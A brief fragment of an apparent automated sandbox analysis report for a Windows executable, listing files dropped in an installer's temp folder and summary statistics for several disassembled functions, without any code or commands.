C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exe

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exe

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exe

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exe

Windows Analysis Report
KYagm8gq5S.exe

Function 0040352F Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464
stringfilecomCOMMON

Function 00405C60 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403C26 Relevance: 44.0, APIs: 14, Strings: 11, Instructions: 215
stringregistryCOMMON

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Function 004068D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON